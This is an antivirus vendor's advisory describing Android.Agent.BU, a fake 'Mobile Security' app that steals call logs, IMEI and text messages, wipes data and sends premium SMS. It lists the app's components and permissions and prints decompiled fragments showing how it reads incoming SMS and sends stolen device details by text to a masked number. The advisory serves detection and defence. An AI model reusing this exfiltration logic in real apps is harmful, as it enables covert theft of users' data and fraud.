Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware
Thirtyseven4 Antivirus | AntiMalware | AntiRootkit | AntiSpyware

Android.Agent.BU (Mobile Security)

 

 

Name:

Android.Agent.BU

Descr. Added:

February 10, 2014

Type:

Fake AV

Risk:

Low

Payload:

N/A

At risk systems:

Android OS

 

 

Malware problems?   We can help.  Free Removal Tools.

 

 

Description:

 

Android.Agent.BU is an Android-based App that was developed to trick users into thinking it is a legitimate antivirus software application called, “Mobile Security”.   

Thirtyseven4 Detects Fake AV on Android


Before installation, the application prompts the user for administrator rights and two options are displayed, ‘Cancel’ and ‘Activate’.  Regardless of the option selected, the application installs itself and obtains administrator rights. Once installed with the required administrator rights, the malicious app displays the following screen below listing a few scanning options.

Thirtyseven4 Detects Fake AV on Android


If one of the options is selected, the App will begin performing various malicious activities in the background while appearing as a virus scan to the end user.

According to analyze by the Thirtyseven4 Viruslab team, Android.Agent.BU is designed to perform the following activities in the background:

1. Stealing the following information below from the compromised phone and sending it to the attacker:

    Phone number
    Call type
    Date of call
    Call duration
    Call-list
    Bot_id
    IMEI (International Mobile Station Equipment Identity) number

2. Stealing text messages from the device’s Inbox.

3. Erasing all user data from the compromised phone, including the SD card data.

4. Calling and sending SMS messages to premium numbers without the user’s consent.

Android.Agent.BU functions in the following ways-

Activity:

- com.soft360.iService.MainActivity

- com.BioTechnology.iClientsService.IncomingCallActivity

Service:

- com.soft360.iService.AService

- com.soft360.iService.webService

Receiver:

- com.soft360.iService.Alarm

- com.soft360.iService.AutoStart

- com.soft360.web.MyAdmin

Permission:

- android.permission.READ_PHONE_STATE

- android.permission.ACCESS_WIFI_STATE

- android.permission.CHANGE_WIFI_STATE

- android.permission.READ_PHONE_STATE

- android.permission.CALL_PHONE

- android.permission.ACCESS_NETWORK_STATE

- android.permission.CHANGE_NETWORK_STATE

- android.permission.WRITE_EXTERNAL_STORAGE

- android.permission.ACCESS_NETWORK_STATE

- android.permission.INTERNET

- android.permission.RECEIVE_BOOT_COMPLETED

- android.permission.WRITE_SMS

- android.permission.READ_SMS

- android.permission.RECEIVE_SMS

- android.permission.SEND_SMS

- android.permission.RECEIVE_BOOT_COMPLETED

- android.permission.READ_CONTACTS

- android.permission.RECORD_AUDIO

Code Snippet:

String str1 = “android.provider.Telephony.SMS_RECEIVED”;

Intent localIntent1 = new Intent(str1);

MainActivity localMainActivity1 = this;

SmsReciever localSmsReciever = SmsReciever.class;

Intent localIntent2 = localIntent1.setClass(localMainActivity1, localSmsReciever);

sendBroadcast(localIntent1);

In SmsReciever

1)    String str2 = localSmsMessage1.getDisplayMessageBody().toString();

str2 contains message received.

String str3 = localSmsMessage1.getOriginatingAddress().trim();

str3 contains message received from the number .

2) The following code locates numbers from the call list of the phone.

if (localsmsParser.isCallList())

{

localdbActions.sent_Call_Details();

continue;      }

Note: In the SMSReceiver class it check for “79********54″ SMS .

3) SMS receiver class calls the dbAction class.

The following methods are present in the db action that performs the malware activity.

a) sent_Call_Details():
b) get_sms_list():
c) getIMEI():
e) setCALL(int paramInt)
f) setSMS(int paramInt)

In WebService Root class:

1) initDeviceServ() is called from alarm class .

Here it checks if the device has more than one SMS count  .

if (this.send_sms_count > 1);

try

{

-  Str1=i am

-  localStringBuilder1 =i am (

-  Str2=Sim Number

-  localStringBuilder2=Sim Number (

-  Str3=Device Name

-  Str4= Device Name )

-  Str5=phone number (79*******45)

It send all the information to 79*******45.

localSmsManager.sendTextMessage(str5, null, str4, null, null);

android_fake_antivirus2

Thirtyseven4 Detects Fake AV on Android


Destination Number:

+44********30 is one of the numbers where all the stolen user data is sent.

<string name=”def_tel_number”>+44********30</string>

Thirtyseven4 customers are fully protected against Android.Agent.BU

Thirtyseven4 Detects Fake AV on Android

 

Thirtyseven4 Tablet Security for Android

Thirtyseven4 Tablet Security for Android

Thirtyseven4 Tablet Security for Android
Thirtyseven4 - Industry Leading Endpoint Security Solution

“Delight yourself in the Lord and he will give you the desires of your heart.” Psalm 37:4